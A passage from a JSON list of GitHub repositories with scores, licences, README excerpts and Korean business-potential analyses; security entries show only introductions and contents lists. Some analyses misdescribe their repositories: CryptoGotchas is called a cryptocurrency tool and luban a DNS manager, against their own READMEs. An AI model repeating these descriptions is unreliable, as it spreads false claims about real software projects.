도구**: 대형","readme_excerpt":"<p align=\"center\">\n    <img src=\"Design/Logo.png\" width=\"480\" max-width=\"90%\" alt=\"stylesync\" />\n</p>\n\n<p align=\"center\">\n    <a href=\"https://travis-ci.org/dylanslewis/stylesync/branches\">\n        <img src=\"https://img.shields.io/travis/dylanslewis/stylesync/master.svg\" alt=\"Travis status\" />\n    </a>\n    <img src=\"https://img.shields.io/badge/Swift-4.2-orange.svg\" />\n    </a>\n    <a href=\"https://swift.org/package-manager\">\n        <img src=\"https://img.shields.io/badge/spm-compatible-brightgreen.svg?style=flat\" alt=\"Swift Package Manager\" />\n    </a>\n    <a href=\"https://twitter.com/dylanslewis\">\n        <img src=\"https://img.shields.io/badge/contact-@dylanslewis-blue.svg?style=flat\" alt=\"Twitter: @dylanslewis\" />\n    </a>\n</p>\n\nWelcome to **stylesync**, a command line tool that extracts text and colour styles from a [Sketch](https://www.sketchapp.com/) document, and generates **native** code for your project's **platform**, **language** and **style**.\n\n# Why?\n\n> A unified design sy","composite_score":0.2428,"license_safety_tag":"safe"},{"name":"zero-to-mastery/travel-guide","github_url":"https://github.com/zero-to-mastery/travel-guide","stars":122,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.2427,"license_safety_tag":"safe"},{"name":"OWASP/owasp-mstg","github_url":"https://github.com/OWASP/owasp-mstg","stars":5,"language":"Python","license":"CC-BY-SA-4.0","abandonment_months":0,"description":"# OWASP/owasp-mstg 상업화 분석\n\n## 왜 보물인가\n스마트폰 앱의 보안 문제를 찾고 수정하는 국제 표준 가이드로, 금융·의료·정부 기관의 필수 요구사항입니다.\n\n## 어디에 쓸 수 있나\n1. **앱 보안 검사 SaaS**: 기업의 스마트폰 앱을 자동으로 검사하고 취약점 리포트를 제공하는 웹 서비스\n2. **모바일 개발사 내부 도구**: 앱 개","readme_excerpt":"<img width=\"180px\" align=\"right\" style=\"float: right;\" src=\"cover.png\">\n\n# OWASP Mobile Application Security Testing Guide (MASTG)\n\n[![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-48A646.svg)](https://owasp.org/projects/)\n[![Creative Commons License](https://img.shields.io/github/license/OWASP/mastg?color=48A646)](https://creativecommons.org/licenses/by-sa/4.0/ \"CC BY-SA 4.0\")\n\n[![Markdown Linter](https://github.com/OWASP/mastg/actions/workflows/markdown-linter.yml/badge.svg?branch=master)](https://github.com/OWASP/mastg/actions/workflows/markdown-linter.yml)\n[![URL Checker](https://github.com/OWASP/mastg/actions/workflows/url-checker.yml/badge.svg?branch=master)](https://github.com/OWASP/mastg/actions/workflows/url-checker.yml)\n\nThe **OWASP Mobile Application Security Testing Guide (MASTG)** is a comprehensive manual for mobile app security testing and reverse engineering. It describes technical processes for verifying the [OWASP Mobile Security Weakness Enume","composite_score":0.2424,"license_safety_tag":"unknown"},{"name":"baidu/bfe","github_url":"https://github.com/baidu/bfe","stars":12,"language":"Go","license":"Apache-2.0","abandonment_months":1,"description":"# baidu/bfe 상품화 분석\n\n## 왜 보물인가\n웹사이트와 앱의 입구 역할을 하는 핵심 기술로, 수백만 명의 사용자를 안전하고 빠르게 연결시키는 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **CDN/호스팅 회사**: 고객의 웹사이트를 빠르게 전달하는 SaaS 서비스로 월 구독료 수집\n2. **대기업 IT팀**: 자사 앱 사용자 수백만 명을 관리하는","readme_excerpt":"# BFE\n\n[![GitHub](https://img.shields.io/github/license/bfenetworks/bfe)](https://github.com/bfenetworks/bfe/blob/develop/LICENSE)\n[![Travis](https://img.shields.io/travis/com/bfenetworks/bfe)](https://travis-ci.com/bfenetworks/bfe)\n[![Go Report Card](https://goreportcard.com/badge/github.com/bfenetworks/bfe)](https://goreportcard.com/report/github.com/bfenetworks/bfe)\n[![GoDoc](https://godoc.org/github.com/bfenetworks/bfe?status.svg)](https://godoc.org/github.com/bfenetworks/bfe/bfe_module)\n[![Snap Status](https://snapcraft.io/bfe/badge.svg)](https://snapcraft.io/bfe)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/3209/badge)](https://bestpractices.coreinfrastructure.org/projects/3209)\n[![FOSSA Status](https://app.fossa.io/api/projects/git%2Bgithub.com%2Fbfenetworks%2Fbfe.svg?type=shield)](https://app.fossa.com/reports/1f05f9f0-ac3d-486e-8ba9-ad95dabd4768)\n[![Slack Widget](https://img.shields.io/badge/join-us%20on%20slack-gray.svg?longCache=true&logo=slac","composite_score":0.2421,"license_safety_tag":"safe"},{"name":"bluscreenofjeff/Red-Team-Infrastructure-Wiki","github_url":"https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki","stars":6,"language":"","license":"bsd-3-clause","abandonment_months":8,"description":"# Red Team Infrastructure Wiki 상업화 분석\n\n## 왜 보물인가\n기업의 보안 취약점을 찾는 전문가들이 실제 현장에서 사용하는 인프라 구축 노하우를 체계적으로 정리한 실전 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 감사 SaaS**: 기업 고객을 위해 이 지식을 기반으로 자동화된 보안 점검 서비스 판매\n2. **내부 업무 ","readme_excerpt":"This wiki is intended to provide a resource for setting up a resilient Red Team infrastructure. It was made to complement Steve Borosh ([@424f424f](https://twitter.com/424f424f)) and Jeff Dimmock's ([@bluscreenofjeff](https://twitter.com/bluscreenofjeff)) BSides NoVa 2017 talk \"Doomsday Preppers: Fortifying Your Red Team Infrastructure\" ([slides](https://speakerdeck.com/rvrsh3ll/doomsday-preppers-fortifying-your-red-team-infrastructure))\n\nIf you have an addition you'd like to make, please submit a Pull Request or file an issue on the repo.\n\nTHANK YOU to all of the authors of the content referenced in this wiki and to all who [contributed](#thanks-to-contributors)!\n\n# Table of Contents\n\n- [Design Considerations](#design-considerations)\n  - [Functional Segregation](#functional-segregation)\n  - [Using Redirectors](#using-redirectors)\n  - [Sample Design](#sample-design)\n  - [Further Resources](#further-resources)\n- [Domains](#domains)\n  - [Categorization and Blacklist Checking Resources](#","composite_score":0.2421,"license_safety_tag":"safe"},{"name":"TritonHo/slides","github_url":"https://github.com/TritonHo/slides","stars":21,"language":"Go","license":"MIT","abandonment_months":2,"description":"","readme_excerpt":"","composite_score":0.242,"license_safety_tag":"safe"},{"name":"FallibleInc/security-guide-for-developers","github_url":"https://github.com/FallibleInc/security-guide-for-developers","stars":21,"language":"","license":"unknown","abandonment_months":9,"description":"# FallibleInc/security-guide-for-developers 분석\n\n## 왜 보물인가\n개발자들이 어플리케이션을 만들 때 해킹을 막기 위해 반드시 알아야 할 지식을 정리한 실용적인 가이드입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 신입 개발자 온보딩 교육 자료로 제공하는 유료 교육 플랫폼\n- **내부 업무 도구**: 기업","readme_excerpt":"# A practical security guide for web developers (Work in progress)\n\n### The intended audience\n\nSecurity issues happen for two reasons - \n\n1. Developers who have just started and cannot really tell a difference between using MD5 or bcrypt.\n2. Developers who know stuff but forget/ignore them.\n\nOur detailed explanations should help the first type while we hope our checklist helps the second one create more secure systems. This is by no means a comprehensive guide, it just covers stuff based on the most common issues we have discovered in the past.\n\n\n### Contents\n\n1. [The Security Checklist](security-checklist.md)\n2. [What can go wrong?](what-can-go-wrong.md)    \n3. [Securely transporting stuff: HTTPS explained](https.md)\n4. Authentication: I am who I say I am  \n4.1 Form based authentication  \n4.2 Basic authentication  \n4.3 One is not enough, 2 factor, 3 factor, ....   \n4.4 Why use insecure text messages? Introducing HOTP & TOTP   \n4.5 Handling password resets\n5. Authorization: What am I a","composite_score":0.2418,"license_safety_tag":"unknown"},{"name":"SalusaSecondus/CryptoGotchas","github_url":"https://github.com/SalusaSecondus/CryptoGotchas","stars":7,"language":"HTML","license":"NOASSERTION","abandonment_months":11,"description":"# CryptoGotchas 상업화 분석\n\n## 왜 보물인가\n암호화폐 거래 시 발생하는 숨겨진 함정과 계산 오류를 미리 찾아주는 검사 도구로, 투자자의 자산 손실을 예방할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 SaaS**: 투자 초보자를 위해 거래 전 위험 요소를 자동 검사하는 브라우저 플러그인 형태로 제공\n2. **자산 관리 ","readme_excerpt":"# CryptoGotchas\nA collection of common (interesting) cryptographic mistakes and learning resources.\n\n**This page is now mastered at [index.md](index.md) and primarily intended to be viewed at [https://gotchas.salusa.dev](https://gotchas.salusa.dev?utm_source=github)**\n","composite_score":0.2412,"license_safety_tag":"unknown"},{"name":"RasaHQ/rasa_nlu","github_url":"https://github.com/RasaHQ/rasa_nlu","stars":5,"language":"Python","license":"apache-2.0","abandonment_months":4,"description":"# Rasa NLU 보물 분석\n\n## 왜 보물인가\n사람의 말을 자동으로 이해하고 분류할 수 있는 기술로, 챗봇이나 음성 서비스를 만드는 핵심 엔진입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 챗봇 플랫폼에 내장하여 고객 상담을 자동화하는 서비스\n- **내부 업무 도구**: 회사 직원들이 자연스럽게 말로 업무 명령을 내릴 수 있는 음","readme_excerpt":"<h1 align=\"center\">Rasa Open Source</h1>\n\n<div align=\"center\">\n\n[![Join the Agent Engineering Community](https://img.shields.io/badge/Community-Join%20the%20Discussion-blueviolet)](https://info.rasa.com/community?utm_source=github&utm_medium=website&utm_campaign=)\n[![Try Hello Rasa](https://img.shields.io/badge/Playground-Try%20Hello%20Rasa-ff69b4)](https://hello.rasa.ai/?utm_source=github&utm_medium=website&utm_campaign=)\n[![PyPI version](https://badge.fury.io/py/rasa.svg)](https://badge.fury.io/py/rasa)\n[![Supported Python Versions](https://img.shields.io/pypi/pyversions/rasa.svg)](https://pypi.python.org/pypi/rasa)\n[![Build Status](https://github.com/RasaHQ/rasa/workflows/Continuous%20Integration/badge.svg)](https://github.com/RasaHQ/rasa/actions)\n[![Documentation Status](https://img.shields.io/badge/docs-stable-brightgreen.svg)](https://rasa.com/docs)\n\n</div>\n\n<br />\n\n<div align=\"center\">\n  <h3>🚧 <b>Note: Maintenance Mode</b> 🚧</h3>\n  <p>\n    Rasa Open Source is currently in mainte","composite_score":0.2412,"license_safety_tag":"safe"},{"name":"boundless-xyz/boundless","github_url":"https://github.com/boundless-xyz/boundless","stars":194,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.2408,"license_safety_tag":"safe"},{"name":"MaxBittker/sandtable","github_url":"https://github.com/MaxBittker/sandtable","stars":7,"language":"Rust","license":"MIT","abandonment_months":3,"description":"# MaxBittker/sandtable 분석\n\n## 왜 보물인가\n모래 위에 패턴을 그리는 물리 시뮬레이션 기술로, 예술 설치미술이나 교육용 인터랙티브 디스플레이 시장에서 독특한 경험을 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **미술관·박물관 전시**: 방문객이 손가락이나 도구로 모래 위의 패턴을 직접 조작하며 즐기는 인터랙티브 전시 시스템\n","readme_excerpt":"<meta charset=\"utf-8\"/>\n\n# sandspiel\n\n\"Imagine the cool phenomenon when the wind blows the falling leaves. This game simulates the phenomenon with powder (dots)!\" -DAN-BALL\n\n![](Screenshot.png)\n\nThis is a [falling sand](https://en.wikipedia.org/wiki/Falling-sand_game) game built in rust (via wasm), webgl, and some JS glueing things together.\n\nYou can [play online](https://sandspiel.club) or read [a longer post on the project](https://maxbittker.com/making-sandspiel)\n\nThe goal was to produce an cellular automata environment that's interesting to play with and supports the sharing and forking of fun creations with other players.\nUltimately, I want the platform to support editing and uploading of your own elements via a programmable cellular automata API.\n\n### 🛠️ Build:\n\n```\n# build the wasm once:\ncd crate && wasm-pack build && cd ..;\nnpm install;\nnpm run start;\n\n# then in a separate terminal:\ncargo watch -s 'wasm-pack build'\n```\n\na successor to my previous efforts in [javascript](https:/","composite_score":0.2407,"license_safety_tag":"safe"},{"name":"sheshbabu/freshlytics","github_url":"https://github.com/sheshbabu/freshlytics","stars":51,"language":"TypeScript","license":"MIT","abandonment_months":3,"description":"","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://github.com/sheshbabu/freshlytics/blob/master/docs/README.md\" alt=\"Freshlytics\">\n    <img src=\"https://raw.githubusercontent.com/sheshbabu/freshlytics/master/docs/title.png\" alt=\"Freshlytics\" />\n  </a>\n</p>\n\n## Overview\n\nFreshlytics is an open source privacy-friendly analytics software. It aims to be reliable, friendly to use and easy to deploy.\n\n[![Awesome Humane Tech](https://raw.githubusercontent.com/humanetech-community/awesome-humane-tech/main/humane-tech-badge.svg?sanitize=true)](https://github.com/humanetech-community/awesome-humane-tech) ![Docker Pulls](https://img.shields.io/docker/pulls/freshlytics/freshlytics?style=flat-square)\n\n<p align=\"center\"><img src=\"https://raw.githubusercontent.com/sheshbabu/freshlytics/master/docs/screenshots/home.png\" /></p>\n\n## Features\n\n- Privacy\n  - Cookies are not used\n  - Personally identifiable information (PII) is not collected\n- Dashboard\n  - Switch between multiple projects\n  - Slice the data within a d","composite_score":0.2405,"license_safety_tag":"safe"},{"name":"udacity/cd0354-monolith-to-microservices-project","github_url":"https://github.com/udacity/cd0354-monolith-to-microservices-project","stars":32,"language":"TypeScript","license":"NOASSERTION","abandonment_months":15,"description":"","readme_excerpt":"","composite_score":0.2399,"license_safety_tag":"unknown"},{"name":"dosco/super-graph","github_url":"https://github.com/dosco/super-graph","stars":9,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"# GraphJin - A Compiler to Connect AI to Your Databases\n\n[![Apache 2.0](https://img.shields.io/github/license/dosco/graphjin.svg?style=for-the-badge)](https://github.com/dosco/graphjin/blob/master/LICENSE)\n[![NPM Package](https://img.shields.io/npm/v/graphjin?style=for-the-badge)](https://www.npmjs.com/package/graphjin)\n[![Docker Pulls](https://img.shields.io/docker/pulls/dosco/graphjin?style=for-the-badge)](https://hub.docker.com/r/dosco/graphjin/tags)\n[![Discord Chat](https://img.shields.io/discord/628796009539043348.svg?style=for-the-badge&logo=discord)](https://discord.gg/6pSWCTZ)\n[![GoDoc](https://img.shields.io/badge/godoc-reference-5272B4.svg?style=for-the-badge&logo=go)](https://pkg.go.dev/github.com/dosco/graphjin/core/v3)\n[![GoReport](https://goreportcard.com/badge/github.com/gojp/goreportcard?style=for-the-badge)](https://goreportcard.com/report/github.com/dosco/graphjin/core/v3)\n\nPoint GraphJin at any database or source tree and AI assistants can query it instantly. Auto-di","composite_score":0.2397,"license_safety_tag":"safe"},{"name":"formium/formik","github_url":"https://github.com/formium/formik","stars":8,"language":"TypeScript","license":"Apache-2.0","abandonment_months":7,"description":"# Formik 저장소 분석\n\n## 왜 보물인가\n웹사이트의 입력 양식(폼)을 쉽게 만들고 관리할 수 있는 도구로, 개발자들이 반복적인 코드 작성을 피하고 사용자 입력을 안전하게 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회원가입, 결제 정보 입력, 프로필 설정 등 다양한 입력 양식이 필요한 웹 애플리케이션\n2. **","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://user-images.githubusercontent.com/4060187/61057426-4e5a4600-a3c3-11e9-9114-630743e05814.png\" width=\"211\" height=\"182\" alt=\"Formik.js\" />\n</p>\n\n<h3 align=\"center\">\n  Build forms in React, without the tears.\n</h3>\n\n<br>\n\n[![Stable Release](https://img.shields.io/npm/v/formik.svg)](https://npm.im/formik)\n[![Blazing Fast](https://badgen.now.sh/badge/speed/blazing%20%F0%9F%94%A5/green)](https://npm.im/formik)\n[![gzip size](http://img.badgesize.io/https://unpkg.com/formik@latest/dist/formik.esm.js?compression=gzip)](https://unpkg.com/formik@latest/dist/formik.esm.js)\n[![license](https://badgen.now.sh/badge/license/Apache-2.0)](./LICENSE)\n[![Discord](https://img.shields.io/discord/769256827007139912.svg?style=flat-square)](https://discord.gg/pJSg287)\n\n**Visit [https://formik.org](https://formik.org) to get started with Formik.**\n\n## Organizations and projects using Formik\n\n[List of organizations and projects using Formik](https://github.com/jaredpalmer/f","composite_score":0.2397,"license_safety_tag":"safe"},{"name":"AI4Finance-LLC/ElegantRL","github_url":"https://github.com/AI4Finance-LLC/ElegantRL","stars":7,"language":"Python","license":"NOASSERTION","abandonment_months":3,"description":"# ElegantRL 사업화 분석\n\n## 왜 보물인가\n금융 투자 결정을 자동으로 내려주는 인공지능 시스템으로, 개인 투자자부터 기관까지 모두가 필요로 하는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독형 투자 자동매매 플랫폼으로 일반 투자자에게 제공\n- **내부 업무 도구**: 증권사/자산운용사의 포트폴리오 관리 시스템에 내장","readme_excerpt":"<div align=\"center\">\r\n<img align=\"center\" width=\"30%\" alt=\"image\" src=\"https://github.com/AI4Finance-Foundation/FinGPT/assets/31713746/e0371951-1ce1-488e-aa25-0992dafcc139\">\r\n</div>\r\n\r\n## ElegantRL “小雅”: Massively Parallel Deep Reinforcement Learning\r\n\r\n[![Downloads](https://pepy.tech/badge/elegantrl)](https://pepy.tech/project/elegantrl)\r\n[![Downloads](https://pepy.tech/badge/elegantrl/week)](https://pepy.tech/project/elegantrl)\r\n[![Python 3.6](https://img.shields.io/badge/python-3.6-blue.svg)](https://www.python.org/downloads/release/python-360/)\r\n[![PyPI](https://img.shields.io/pypi/v/elegantrl.svg)](https://pypi.org/project/elegantrl/)\r\n![License](https://img.shields.io/github/license/AI4Finance-Foundation/elegantrl.svg?color=brightgreen)\r\n![](https://img.shields.io/github/issues-raw/AI4Finance-Foundation/elegantrl?label=Issues)\r\n![](https://img.shields.io/github/issues-closed-raw/AI4Finance-Foundation/elegantrl?label=Closed+Issues)\r\n![](https://img.shields.io/github/issues-pr-raw/","composite_score":0.2393,"license_safety_tag":"unknown"},{"name":"Miodec/monkeytype","github_url":"https://github.com/Miodec/monkeytype","stars":14,"language":"TypeScript","license":"GPL-3.0","abandonment_months":0,"description":"# Miodec/monkeytype 상용화 분석\n\n## 왜 보물인가\n사람들이 타이핑 실력을 게임처럼 즐기며 측정할 수 있는 웹 서비스로, 전 세계 타이핑 애호가와 프로그래머들이 즐겨 사용하는 인기 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **타이핑 실력 측정 SaaS**: 개인 사용자를 위한 월구독 서비스로 고급 통계, 맞춤형 연습, 순위표 기능 제공","readme_excerpt":"[![](https://github.com/monkeytypegame/monkeytype/blob/master/frontend/static/images/githubbanner2.png?raw=true)](https://monkeytype.com/)\n<br />\n\n[![ChartJs](https://img.shields.io/badge/Chart.js-FF6384?style=for-the-badge&logo=chartdotjs&logoColor=white)](https://www.chartjs.org/)\n[![Eslint](https://img.shields.io/badge/eslint-4B32C3?style=for-the-badge&logo=eslint&logoColor=white)](https://eslint.org/)\n[![Express](https://img.shields.io/badge/-Express-373737?style=for-the-badge&logo=Express&logoColor=white)](https://expressjs.com/)\n[![Firebase](https://img.shields.io/badge/firebase-DD2C00?style=for-the-badge&logo=firebase&logoColor=black)](https://firebase.google.com/)\n[![Fontawesome](https://img.shields.io/badge/fontawesome-538DD7?style=for-the-badge&logo=fontawesome&logoColor=white)](https://fontawesome.com/)\n[![HTML5](https://img.shields.io/badge/html5-E34F26?style=for-the-badge&logo=html5&logoColor=white)](https://developer.mozilla.org/en-US/docs/Web/HTML)\n[![MongoDB](https://im","composite_score":0.2392,"license_safety_tag":"restricted"},{"name":"antvis/f2","github_url":"https://github.com/antvis/f2","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# antvis/f2 분석 보고서\n\n## 왜 보물인가\n스마트폰이나 태블릿 같은 작은 화면에서도 깔끔하게 보이는 차트와 그래프를 만들 수 있는 도구로, 모바일 앱 개발자들의 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융 앱 SaaS**\n- 증권사, 자산관리 앱이 실시간 주가 차트와 자산 현황을 모바일 화면에 표시하는 데 활용\n\n**2. 내부 분","readme_excerpt":"![](https://user-images.githubusercontent.com/6628666/44565744-476f1880-a79c-11e8-802b-2477493162c7.png)\n\n[![](https://img.shields.io/travis/antvis/f2.svg)](https://travis-ci.org/antvis/f2) ![](https://img.shields.io/badge/language-javascript-red.svg) ![](https://img.shields.io/badge/license-MIT-000000.svg) [![npm package](https://img.shields.io/npm/v/@antv/f2.svg)](https://www.npmjs.com/package/@antv/f2) [![NPM downloads](http://img.shields.io/npm/dm/@antv/f2.svg)](https://npmjs.org/package/@antv/f2) [![Percentage of issues still open](http://isitmaintained.com/badge/open/antvis/f2.svg)](http://isitmaintained.com/project/antvis/f2 'Percentage of issues still open') [![Ask DeepWiki](https://deepwiki.com/badge.svg)](https://deepwiki.com/antvis/F2)\n\nF2，一个专注于移动，开箱即用的可视化解决方案，完美支持 H5 环境同时兼容多种环境（node, 小程序，weex）。完备的图形语法理论，满足你的各种可视化需求。专业的移动设计指引为你带来最佳的移动端图表体验。[英文 README](./README.en-US.md)\n\n<p align=\"left\"><img src=\"https://user-images.githubusercontent.com/6628666/44565820-c2d0ca00-a79c-11e8-9","composite_score":0.2387,"license_safety_tag":"safe"},{"name":"spacejam/sled","github_url":"https://github.com/spacejam/sled","stars":5,"language":"Rust","license":"apache-2.0","abandonment_months":2,"description":"# spacejam/sled 분석 보고서\n\n## 왜 보물인가\n매우 빠르고 안정적인 데이터 저장 기술로, 웹 서비스에서 대량의 정보를 빠르게 처리해야 할 때 핵심 도구가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **실시간 채팅/메시징 SaaS**: 메시지를 초고속으로 저장하고 검색하는 대화 플랫폼의 백엔드 기술\n2. **내부 업무 도구**: 회사 ","readme_excerpt":"\n<table style=\"width:100%\">\n<tr>\n  <td>\n    <table style=\"width:100%\">\n      <tr>\n        <td> key </td>\n        <td> value </td>\n      </tr>\n      <tr>\n        <td><a href=\"https://docs.rs/sled\">documentation</a></td>\n        <td><a href=\"https://docs.rs/sled\"><img src=\"https://docs.rs/sled/badge.svg\"></a></td>\n      </tr>\n      <tr>\n        <td><a href=\"https://discord.gg/Z6VsXds\">chat about databases with us</a></td>\n        <td><a href=\"https://discord.gg/Z6VsXds\"><img src=\"https://img.shields.io/discord/509773073294295082.svg?logo=discord\"></a></td>\n      </tr>\n     </table>\n  </td>\n  <td>\n<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/spacejam/sled/main/art/tree_face_anti-transphobia.png\" width=\"40%\" height=\"auto\" />\n  </p>\n  </td>\n </tr>\n</table>\n\n\n# sled - ~~it's all downhill from here!!!~~\n\nAn embedded database.\n\n```rust\nlet tree = sled::open(\"/tmp/welcome-to-sled\")?;\n\n// insert and get, similar to std's BTreeMap\nlet old_value = tree.insert(\"key\", \"value\")?;\n","composite_score":0.2386,"license_safety_tag":"safe"},{"name":"grandyang/leetcode","github_url":"https://github.com/grandyang/leetcode","stars":8,"language":"","license":"unknown","abandonment_months":17,"description":"","readme_excerpt":"# LeetCode All In One\n\n![](https://img.shields.io/travis/skygragon/leetcode-cli.svg?style=flat)\n![](https://img.shields.io/badge/language-C++-red.svg)\n![](https://img.shields.io/badge/language-Java-yellow.svg)\n![](https://img.shields.io/badge/%3E-leetcode-green.svg)\n![](https://img.shields.io/badge/%3C-awesome-green.svg)\n\n\nEnglish | [简体中文](./README-CN.md) \n\n---\n\nProvide all my solutions and explanations in Chinese for all the Leetcode coding problems.\n\nSame as this: [LeetCode All in One 题目讲解汇总(持续更新中...)](https://www.cnblogs.com/grandyang/p/4606334.html)\n\n[Click below image to watch YouTube Video](https://www.youtube.com/playlist?list=PLZFoAdzIur8ii06R2KsX7Mct2PEuUh0tc)\n[![Video](https://raw.githubusercontent.com/grandyang/leetcode/master/podcast.png)](https://www.youtube.com/playlist?list=PLZFoAdzIur8ii06R2KsX7Mct2PEuUh0tc)\n\nNote: All explanations are written in Github Issues, **please do not create any new issue or pull request in this project since the problem index should be consist","composite_score":0.2384,"license_safety_tag":"unknown"},{"name":"Tyrrrz/LightBulb","github_url":"https://github.com/Tyrrrz/LightBulb","stars":8,"language":"C#","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"# LightBulb\n\n[![Status](https://img.shields.io/badge/status-maintenance-ffd700.svg)](https://github.com/Tyrrrz/.github/blob/prime/docs/project-status.md)\n[![Made in Ukraine](https://img.shields.io/badge/made_in-ukraine-ffd700.svg?labelColor=0057b7)](https://tyrrrz.me/ukraine)\n[![Build](https://img.shields.io/github/actions/workflow/status/Tyrrrz/LightBulb/main.yml?branch=prime)](https://github.com/Tyrrrz/LightBulb/actions)\n[![Coverage](https://img.shields.io/codecov/c/github/Tyrrrz/LightBulb/prime)](https://codecov.io/gh/Tyrrrz/LightBulb)\n[![Release](https://img.shields.io/github/release/Tyrrrz/LightBulb.svg)](https://github.com/Tyrrrz/LightBulb/releases)\n[![Downloads](https://img.shields.io/github/downloads/Tyrrrz/LightBulb/total.svg)](https://github.com/Tyrrrz/LightBulb/releases)\n[![Discord](https://img.shields.io/discord/869237470565392384?label=discord)](https://discord.gg/2SUWKFnHSm)\n[![Fuck Russia](https://img.shields.io/badge/fuck-russia-e4181c.svg?labelColor=000000)](https://tw","composite_score":0.2384,"license_safety_tag":"safe"},{"name":"dnsjia/luban","github_url":"https://github.com/dnsjia/luban","stars":8,"language":"","license":"unknown","abandonment_months":11,"description":"# dnsjia/luban 상용화 분석\n\n## 왜 보물인가\n저장소 정보만으로는 구체적인 기능을 파악하기 어려우나, 최근 활발한 개발(2025년 6월 커밋)과 8개의 스타는 개발자들 사이에서 관심을 받는 초기 프로젝트임을 시사합니다.\n\n## 어디에 쓸 수 있나\n1. **DNS 관리 SaaS**: 도메인 이름 관리를 필요로 하는 소규모 웹사이트 운영자들을 위한","readme_excerpt":"## 项目简介\n  LuBan运维平台是一个基于Go语言+Vue开发的Kubernetes多集群管理平台，可以兼容不同云厂商Kubernetes集群，同时，平台还集成CMDB资产管理。方便用户管理集群、节点等基础资源。通过使用LuBan运维平台，可以提升运维效率，降低维护成本。\n\n<p align=\"center\">\n  <a href=\"https://golang.google.cn/\">\n    <img src=\"https://img.shields.io/badge/Golang-1.21-green.svg\" alt=\"golang\">\n  </a>\n  <a href=\"https://gin-gonic.com/\">\n    <img src=\"https://img.shields.io/badge/Gin-1.7.4-red.svg\" alt=\"gin\">\n  </a>\n  <a href=\"https://gorm.io/\">\n    <img src=\"https://img.shields.io/badge/Gorm-1.21-orange.svg\" alt=\"gorm\">\n  </a>\n  <a href=\"https://redis.io/\">\n    <img src=\"https://img.shields.io/badge/redis-5.0-brightgreen.svg\" alt=\"redis\">\n  </a>\n  <a href=\"https://vuejs.org/\">\n    <img src=\"https://img.shields.io/badge/Vue-3.0.0-orange.svg\" alt=\"vue\">\n  </a>\n  <a href=\"https://antdv.com/docs/vue/introduce-cn/\">\n    <img src=\"https://img.shields.io/badge/Ant%20Design-4.x-blue.svg\" alt=\"Ant Design\">\n  </a>\n</p>\n\n> LuBan 鲁班运维平台2.0， 本项目使用Go1.20.x、 Gin、Gorm开发， 前端使用的是Vue3+Ant Design4.x框架。\n\n\n![avatar](./docs/","composite_score":0.2383,"license_safety_tag":"unknown"},{"name":"VinAIResearch/PhoMT","github_url":"https://github.com/VinAIResearch/PhoMT","stars":10,"language":"","license":"unknown","abandonment_months":12,"description":"# PhoMT 저장소 분석\n\n## 왜 보물인가\n베트남어를 다른 언어로 자동 번역해주는 기술로, 베트남 시장 진출이나 동남아시아 비즈니스 확장을 원하는 기업들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **번역 SaaS 서비스**: 베트남 기업들이 영어 자료를 베트남어로, 베트남어 콘텐츠를 영어로 자동 번역하는 웹 서비스\n2. **전자상거래 플랫폼","readme_excerpt":"# PhoMT: A High-Quality and Large-Scale Benchmark Dataset for Vietnamese-English Machine Translation\n\n\nPhoMT is a high-quality and large-scale Vietnamese-English parallel dataset of 3.02M sentence pairs. The dataset statistics are as follows:\n\n<img width=\"750\" alt=\"PhoMT statistics\" src=\"https://user-images.githubusercontent.com/2412555/139051008-43966c7c-5ebc-4906-b656-7ac36ade1c52.png\">\n\nDetails of the dataset construction and experimental results can be found in our [EMNLP 2021 paper](https://aclanthology.org/2021.emnlp-main.369/):\n\n\t@inproceedings{PhoMT,\n    title     = {{PhoMT: A High-Quality and Large-Scale Benchmark Dataset for Vietnamese-English Machine Translation}},\n    author    = {Long Doan and Linh The Nguyen and Nguyen Luong Tran and Thai Hoang and Dat Quoc Nguyen},\n    booktitle = {Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing},\n    year      = {2021},\n    pages     = {4495--4503}\n    }\n    \nPlease follow this [**LINK**](https://h","composite_score":0.238,"license_safety_tag":"unknown"},{"name":"greatghoul/remote-working","github_url":"https://github.com/greatghoul/remote-working","stars":5,"language":"Ruby","license":"MIT","abandonment_months":0,"description":"# Remote Working 저장소 분석\n\n## 왜 보물인가\n재택근무 환경에서 팀의 협력과 생산성을 높이는 도구나 가이드를 제공하여, 분산된 팀도 효율적으로 일할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 재택근무 팀을 위한 시간 추적, 화상회의 최적화, 팀 소통 플랫폼으로 발전\n- **내부 업무 도구**: 기업의 인사 부","readme_excerpt":"<h1 align=\"center\">\n  <img src=\"./assets/logo.png\" alt=\"Remote Working Logo\" width=\"90\">\n  <div>远程工作者</div>\n</h1>\n\n- 本列表短网址：<https://anl.gg/remote>\n- 本列表主要用于整理中国国内的资源或者对国内受众友好的国外资源\n- 远程工作信息也会发布到以下渠道，可以自由选择惯用的渠道关注更新\n  - Telegram Channel - https://t.me/s/remote_cn\n  - 远程工作机会网站 - https://remote-china.com/\n  - 豆瓣小组 - https://www.douban.com/group/657287/\n  - 知识星球 - https://wx.zsxq.com/group/15528185251482\n  - 